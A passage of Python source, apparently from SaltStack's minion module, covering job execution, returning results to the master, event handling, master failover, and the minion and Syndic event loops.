self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
# We stash an instance references to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
multiprocessing_enabled = self.opts.get('multiprocessing', True)
if multiprocessing_enabled:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
with default_signals(signal.SIGINT, signal.SIGTERM):
process = SignalHandlingMultiprocessingProcess(
target=self._target, args=(instance, self.opts, data, self.connected)
)
else:
process = threading.Thread(
target=self._target,
args=(instance, self.opts, data, self.connected),
name=data['jid']
)
if multiprocessing_enabled:
with default_signals(signal.SIGINT, signal.SIGTERM):
# Reset current signals before starting the process in
# order not to inherit the current signal handlers
process.start()
else:
process.start()
# TODO: remove the windows specific check?
if multiprocessing_enabled and not salt.utils.is_windows():
# we only want to join() immediately if we are daemonizing a process
process.join()
else:
self.win_proc.append(process)
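    # Dispatch summary for the method above: with multiprocessing enabled each
    # job runs in its own SignalHandlingMultiprocessingProcess (started with
    # default signal handlers and, on non-Windows platforms, joined right away
    # so it can daemonize); otherwise the thread/process handle is kept in
    # self.win_proc.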
def ctx(self):
'''Return a single context manager for the minion's data
'''
if six.PY2:
return contextlib.nested(
self.functions.context_dict.clone(),
self.returners.context_dict.clone(),
self.executors.context_dict.clone(),
)
else:
exitstack = contextlib.ExitStack()
exitstack.push(self.functions.context_dict.clone())
exitstack.push(self.returners.context_dict.clone())
exitstack.push(self.executors.context_dict.clone())
return exitstack
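    # ctx() packs the cloned __context__ dicts of functions, returners and
    # executors into one context manager; _target() enters it via
    # tornado.stack_context.StackContext so each job runs with its own copy
    # of the context data.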
@classmethod
def _target(cls, minion_instance, opts, data, connected):
if not minion_instance:
minion_instance = cls(opts)
minion_instance.connected = connected
if not hasattr(minion_instance, 'functions'):
functions, returners, function_errors, executors = (
minion_instance._load_modules()
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
with tornado.stack_context.StackContext(minion_instance.ctx):
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
Minion._thread_multi_return(minion_instance, opts, data)
else:
Minion._thread_return(minion_instance, opts, data)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if sys.platform.startswith('win') and \
opts['multiprocessing'] and \
not salt.log.setup.is_logging_configured():
# We have to re-init the logging system for Windows
salt.log.setup.setup_console_logger(log_level=opts.get('log_level', 'info'))
if opts.get('log_file'):
salt.log.setup.setup_logfile_logger(opts['log_file'], opts.get('log_level_logfile', 'info'))
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.appendproctitle('{0}._thread_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID {0}'.format(sdata['pid']))
with salt.utils.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
if function_name in minion_instance.functions:
try:
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
# this minion is blacked out. Only allow saltutil.refresh_pillar
if function_name != 'saltutil.refresh_pillar' and \
function_name not in minion_instance.opts['pillar'].get('minion_blackout_whitelist', []):
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
func = minion_instance.functions[function_name]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
executors = data.get('module_executors') or opts.get('module_executors', ['direct_call.get'])
if isinstance(executors, six.string_types):
executors = [executors]
elif not isinstance(executors, list) or not executors:
raise SaltInvocationError("Wrong executors specification: {0}. String or non-empty list expected".
format(executors))
if opts.get('sudo_user', '') and executors[-1] != 'sudo.get':
if executors[-1] in FUNCTION_EXECUTORS:
executors[-1] = 'sudo.get' # replace
else:
executors.append('sudo.get') # append
log.trace('Executors list {0}'.format(executors)) # pylint: disable=no-member
# Get executors
def get_executor(name):
executor_class = minion_instance.executors.get(name)
if executor_class is None:
raise SaltInvocationError("Executor '{0}' is not available".format(name))
return executor_class
# Get the last one that is function executor
executor = get_executor(executors.pop())(opts, data, func, args, kwargs)
# Instantiate others from bottom to the top
for executor_name in reversed(executors):
executor = get_executor(executor_name)(opts, data, executor)
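                    # For example (hypothetical executor list): with
                    # executors == ['splay.get', 'direct_call.get'] the
                    # direct_call executor is built first with the resolved
                    # function and its args, then wrapped as
                    # splay(opts, data, <direct_call executor>) before
                    # execute() is called below.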
return_data = executor.execute()
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
ret['retcode'] = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
ret['success'] = True
except CommandNotFoundError as exc:
msg = 'Command required for \'{0}\' not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
except CommandExecutionError as exc:
log.error(
'A command in \'{0}\' had a problem: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
except SaltInvocationError as exc:
log.error(
'Problem executing \'{0}\': {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing \'{0}\': {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
except TypeError as exc:
msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format(function_name, exc, func.__doc__, )
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: \'{0}\''.format(
minion_instance.function_errors[mod_name]
)
ret['success'] = False
ret['retcode'] = 254
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
# TODO: make a list? Seems odd to split it this late :/
if data['ret'] and isinstance(data['ret'], six.string_types):
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
log.error(traceback.format_exc())
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
salt.utils.appendproctitle('{0}._thread_multi_return {1}'.format(cls.__name__, data['jid']))
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if sys.platform.startswith('win') and \
opts['multiprocessing'] and \
not salt.log.is_logging_configured():
# We have to re-init the logging system for Windows
salt.log.setup_console_logger(log_level=opts.get('log_level', 'info'))
if opts.get('log_file'):
salt.log.setup_logfile_logger(opts['log_file'], opts.get('log_level_logfile', 'info'))
ret = {
'return': {},
'success': {},
}
for ind in range(0, len(data['fun'])):
ret['success'][data['fun'][ind]] = False
try:
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
# this minion is blacked out. Only allow saltutil.refresh_pillar
if data['fun'][ind] != 'saltutil.refresh_pillar' and \
data['fun'][ind] not in minion_instance.opts['pillar'].get('minion_blackout_whitelist', []):
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
ret['return'][data['fun'][ind]] = func(*args, **kwargs)
ret['success'][data['fun'][ind]] = True
except Exception as exc:
trb = traceback.format_exc()
log.warning(
'The minion function caused an exception: {0}'.format(
exc
)
)
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
def _return_pub(self, ret, ret_cmd='_return', timeout=60, sync=True):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: {0}'.format(jid))
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['id'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__')}
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error('Invalid outputter {0}. This is likely a bug.'
.format(ret['out']))
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
salt.utils.minion.cache_jobs(self.opts, load['jid'], ret)
if not self.opts['pub_ret']:
return ''
def timeout_handler(*_):
msg = ('The minion failed to return the job information for job '
'{0}. This is often due to the master being shut down or '
'overloaded. If the master is running consider increasing '
'the worker_threads value.').format(jid)
log.warning(msg)
return True
if sync:
try:
ret_val = self._send_req_sync(load, timeout=timeout)
except SaltReqTimeoutError:
timeout_handler()
return ''
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
log.trace('ret_val = {0}'.format(ret_val)) # pylint: disable=no-member
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
if self.opts.get('master_type', 'str') == 'disable' and \
self.opts.get('file_client', 'remote') == 'remote':
log.warning('Cannot run startup_states when \'master_type\' is '
'set to \'disable\' and \'file_client\' is set to '
'\'remote\'. Skipping.')
else:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# dup name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify={0}'.format(notify))
self.functions, self.returners, _, self.executors = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
# TODO: only allow one future in flight at a time?
@tornado.gen.coroutine
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
log.debug('Refreshing pillar')
try:
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
except SaltClientError:
# Do not exit if a pillar refresh fails.
log.error('Pillar data could not be refreshed. '
'One or more masters may be down!')
self.module_refresh(force_refresh)
def manage_schedule(self, tag, data):
'''
Refresh the functions and returners.
'''
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
persist = data.get('persist', None)
if func == 'delete':
self.schedule.delete_job(name, persist)
elif func == 'add':
self.schedule.add_job(schedule, persist)
elif func == 'modify':
self.schedule.modify_job(name, schedule, persist, where)
elif func == 'enable':
self.schedule.enable_schedule()
elif func == 'disable':
self.schedule.disable_schedule()
elif func == 'enable_job':
self.schedule.enable_job(name, persist, where)
elif func == 'run_job':
self.schedule.run_job(name)
elif func == 'disable_job':
self.schedule.disable_job(name, persist, where)
elif func == 'reload':
self.schedule.reload(schedule)
elif func == 'list':
self.schedule.list(where)
elif func == 'save_schedule':
self.schedule.save_schedule()
def manage_beacons(self, tag, data):
'''
Manage Beacons
'''
func = data.get('func', None)
name = data.get('name', None)
beacon_data = data.get('beacon_data', None)
if func == 'add':
self.beacons.add_beacon(name, beacon_data)
elif func == 'modify':
self.beacons.modify_beacon(name, beacon_data)
elif func == 'delete':
self.beacons.delete_beacon(name)
elif func == 'enable':
self.beacons.enable_beacons()
elif func == 'disable':
self.beacons.disable_beacons()
elif func == 'enable_beacon':
self.beacons.enable_beacon(name)
elif func == 'disable_beacon':
self.beacons.disable_beacon(name)
elif func == 'list':
self.beacons.list_beacons()
def environ_setenv(self, tag, data):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This {0} was scheduled to stop. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
elif self._running is True:
log.error(
'This {0} is already running. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
try:
log.info(
'{0} is starting as user \'{1}\''.format(
self.__class__.__name__,
salt.utils.get_user()
)
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting {0}'.format(
self.__class__.__name__
),
exc_info=err
)
def _mine_send(self, tag, data):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
data['tok'] = self.tok
try:
ret = channel.send(data)
return ret
except SaltReqTimeoutError:
log.warning('Unable to send mine data to master.')
return None
@tornado.gen.coroutine
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
if not self.ready:
raise tornado.gen.Return()
tag, data = salt.utils.event.SaltEvent.unpack(package)
log.debug('Minion of "{0}" is handling event tag \'{1}\''.format(self.opts['master'], tag))
if tag.startswith('module_refresh'):
self.module_refresh(notify=data.get('notify', False))
elif tag.startswith('pillar_refresh'):
yield self.pillar_refresh()
elif tag.startswith('manage_schedule'):
self.manage_schedule(tag, data)
elif tag.startswith('manage_beacons'):
self.manage_beacons(tag, data)
elif tag.startswith('grains_refresh'):
if self.grains_cache != self.opts['grains']:
yield self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
elif tag.startswith('environ_setenv'):
self.environ_setenv(tag, data)
elif tag.startswith('_minion_mine'):
self._mine_send(tag, data)
elif tag.startswith('fire_master'):
log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
elif tag.startswith('__master_disconnected') or tag.startswith('__master_failback'):
# if the master disconnect event is for a different master, ignore it
if tag.startswith('__master_disconnected') and data['master'] != self.opts['master']:
# not my master, ignore
return
if tag.startswith('__master_failback'):
# if the master failback event is not for the top master, raise an exception
if data['master'] != self.opts['master_list'][0]:
raise SaltException('Bad master \'{0}\' when my master is \'{1}\''.format(
data['master'], self.opts['master']))
# if the master failback event is for the current master, raise an exception
elif data['master'] == self.opts['master']:
raise SaltException('Already connected to \'{0}\''.format(data['master']))
if self.connected:
# we are not connected anymore
self.connected = False
# modify the scheduled job to fire only on reconnect
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name='__master_alive_{0}'.format(self.opts['master']),
schedule=schedule)
log.info('Connection to master {0} lost'.format(self.opts['master']))
if self.opts['master_type'] == 'failover':
log.info('Trying to tune in to next master from master-list')
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'auth'):
self.pub_channel.auth.invalidate()
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
try:
master, self.pub_channel = yield self.eval_master(
opts=self.opts,
failed=True)
except SaltClientError:
pass
if self.connected:
self.opts['master'] = master
# re-init the subsystems to work with the new master
log.info('Re-initialising subsystems for new '
'master {0}'.format(self.opts['master']))
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.pub_channel.on_recv(self._handle_payload)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive_{0}'.format(self.opts['master']),
schedule=schedule)
if self.opts['master_failback'] and 'master_list' in self.opts:
if self.opts['master'] != self.opts['master_list'][0]:
schedule = {
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master_list'][0]}
}
self.schedule.modify_job(name='__master_failback',
schedule=schedule)
else:
self.schedule.delete_job(name='__master_failback', persist=True)
else:
self.restart = True
self.io_loop.stop()
elif tag.startswith('__master_connected'):
# handle this event only once. otherwise it will pollute the log
if not self.connected:
log.info('Connection to master {0} re-established'.format(self.opts['master']))
self.connected = True
# modify the __master_alive job to only fire,
# if the connection is lost again
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive_{0}'.format(self.opts['master']),
schedule=schedule)
elif tag.startswith('__schedule_return'):
self._return_pub(data, ret_cmd='_return', sync=False)
elif tag.startswith('_salt_error'):
if self.connected:
log.debug('Forwarding salt error event tag={tag}'.format(tag=tag))
self._fire_master(data, tag)
def _fallback_cleanups(self):
'''
Fallback cleanup routines, attempting to fix leaked processes, threads, etc.
'''
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
# Cleanup Windows threads
if not salt.utils.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
# Main Minion Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
log.debug('Minion \'{0}\' trying to tune in'.format(self.opts['id']))
if start:
self.sync_connect_master()
if self.connected:
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
salt.utils.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
loop_interval = self.opts['loop_interval']
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
self.periodic_callbacks = {}
# schedule the stuff that runs every interval
ping_interval = self.opts.get('ping_interval', 0) * 60
if ping_interval > 0 and self.connected:
def ping_master():
try:
if not self._fire_master('ping', 'minion_ping'):
if not self.opts.get('auth_safemode', True):
log.error('** Master Ping failed. Attempting to restart minion**')
delay = self.opts.get('random_reauth_delay', 5)
log.info('delaying random_reauth_delay {0}s'.format(delay))
# regular sys.exit raises an exception -- which isn't sufficient in a thread
os._exit(salt.defaults.exitcodes.SALT_KEEPALIVE)
except Exception:
log.warning('Attempt to ping master failed.', exc_info_on_loglevel=logging.DEBUG)
self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000, io_loop=self.io_loop)
self.periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(self._fallback_cleanups, loop_interval * 1000, io_loop=self.io_loop)
def handle_beacons():
# Process Beacons
beacons = None
try:
beacons = self.process_beacons(self.functions)
except Exception:
log.critical('The beacon errored: ', exc_info=True)
if beacons and self.connected:
self._fire_master(events=beacons)
self.periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(handle_beacons, loop_interval * 1000, io_loop=self.io_loop)
# TODO: actually listen to the return and change period
def handle_schedule():
self.process_schedule(self, loop_interval)
if hasattr(self, 'schedule'):
self.periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000, io_loop=self.io_loop)
# start all the other callbacks
for periodic_cb in six.itervalues(self.periodic_callbacks):
periodic_cb.start()
# add handler to subscriber
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(self._handle_payload)
elif self.opts.get('master_type') != 'disable':
log.error('No connection to master found. Scheduled jobs will not run.')
if start:
try:
self.io_loop.start()
if self.restart:
self.destroy()
except (KeyboardInterrupt, RuntimeError): # A RuntimeError can be re-raised by Tornado on shutdown
self.destroy()
def _handle_payload(self, payload):
if payload is not None and payload['enc'] == 'aes':
if self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
elif self.opts['zmq_filtering']:
# In the filtering enabled case, we'd like to know when the minion sees something it shouldn't
log.trace('Broadcast message received that is not for this minion. Load: {0}'.format(payload['load']))
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the minion currently has no need.
def _target_load(self, load):
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
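# Sketch of a minimal load this check accepts (keys come from the checks in this
# method; values are hypothetical):
#   {'tgt': 'web*', 'jid': '20170101000000000000', 'fun': 'test.ping',
#    'arg': [], 'tgt_type': 'glob'}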
if 'tgt_type' in load:
match_func = getattr(self.matcher,
'{0}_match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matcher.glob_match(load['tgt']):
return False
return True
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if hasattr(self, 'schedule'):
del self.schedule
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
if hasattr(self, 'periodic_callbacks'):
for cb in six.itervalues(self.periodic_callbacks):
cb.stop()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion. This minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
# force auth_safemode True because Syndics don't support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
self.jid_forward_cache = set()
self.jids = {}
self.raw_events = []
self.pub_future = None
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# TODO: even do this??
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
# Only forward the command if it didn't originate from ourselves
if data.get('master_id', 0) != self.opts.get('master_id', 1):
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
def timeout_handler(*args):
log.warning('Unable to forward pub data: {0}'.format(args[1]))
return True
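# Note: the pub_async call below is deliberately fire-and-forget (no-op callback);
# failures surface through the timeout_handler above rather than a return value.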
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self.local.pub_async(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
io_loop=self.io_loop,
callback=lambda _: None,
**kwargs)
def _fire_master_syndic_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start',
sync=False,
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
sync=False,
)
# Syndic Tune In
@tornado.gen.coroutine
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
log.debug('Syndic \'{0}\' trying to tune in'.format(self.opts['id']))
if start:
self.sync_connect_master()
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
self.local.event.subscribe('')
self.local.opts['interface'] = self._syndic_interface
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
# register the event sub to the poller
self._reset_event_aggregation()
self.local.event.set_event_handler(self._process_event)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
io_loop=self.io_loop)
self.forward_events.start()
# Send an event to the master that the minion is live
self._fire_master_syndic_start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
if start:
self.io_loop.start()
# TODO: clean up docs
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
def _process_cmd_socket(self, payload):
if payload is not None and payload['enc'] == 'aes':
log.trace('Handling payload')
self._handle_decoded_payload(payload['load'])
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the syndic currently has no need.
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
event = {'data': data, 'tag': mtag}
log.trace('Got event {0}'.format(event['tag'])) # pylint: disable=no-member
tag_parts = event['tag'].split('/')
